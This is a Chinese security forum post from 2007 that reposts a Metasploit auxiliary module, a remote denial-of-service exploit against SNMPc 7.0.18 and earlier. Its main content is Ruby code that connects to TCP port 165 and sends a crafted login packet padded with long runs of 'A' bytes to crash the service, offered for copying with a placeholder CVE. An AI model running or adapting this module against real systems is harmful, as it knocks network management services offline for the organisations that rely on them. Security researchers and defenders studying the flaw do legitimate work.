‹‹ 上一主题 | 下一主题 ››
发新话题
打印

SNMPc <= 7.0.18 Remote Denial of Service Exploit (meta)

ring04h

团队执行官

Rank: 8Rank: 8

E.S.T核心成员 社区主管

帖子
3923 
精华
128 
积分
209640 
阅读权限
200 
性别
男 
在线时间
1096 小时 
注册时间
2007-10-23 
最后登录
2008-7-23 

资料收集奖 运营支持奖

楼主 发表于 2007-6-12 01:12  只看该作者

SNMPc <= 7.0.18 Remote Denial of Service Exploit (meta)

复制内容到剪贴板
代码:
##
# $Id: snmpc.rb 2007-06-03 $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# [url]http://metasploit.com/projects/Framework/[/url]
##


require 'msf/core'

module Msf

class Auxiliary::Dos::Windows::Snmpc < Msf::Auxiliary

  include Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,  
      &#39;Name&#39;      => &#39;SNMPc &#39;,
      &#39;Description&#39;  => %q{
        This module sends a specially-crafted packet to the service login of snmpc
        causing a denial of service of snmpc.
      },
      &#39;Author&#39;     => [ &#39;En Douli, Tks to OaiTeam <[email]DouliEn@gmail.com[/email]>&#39; ],
      &#39;License&#39;    => MSF_LICENSE,
      &#39;Version&#39;    => &#39;$Revision: 1 $&#39;,
      &#39;References&#39;   =>
        [
          [ &#39;CVE&#39;, &#39;XXXXXXX&#39; ],
        ]))
      
      register_options([Opt::RPORT(165),], self.class)
  end

  def run
    connect
    init = "\x14\x00\x00\x00\x70\xa9\x00\x00\x51\x03\x00\x00\x02\x00\x00\x00\x72\x63\x6f\x6e"
    pkt = "\x29\x00\x00\x00\xbc\xee\x00\x00\x52\x03\x00\x00\x02\x00\x00\x00\x41\x64\x6d\x69\x6e\x69\x73\x74\x72\x61\x74"
    pkt << "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" * 56
    pkt << "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x09"
    pkt << "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" * 35
    pkt <<  "\x41\x41\x41\x41\x41\x41\x41\x41\x09\x30\x00"
   
    print_status("Sending dos packet ... ")
   
    sock.put(init)
    sock.put(pkt)
   
    disconnect
  end

end
end  

TOP

‹‹ 上一主题 | 下一主题 ››
发新话题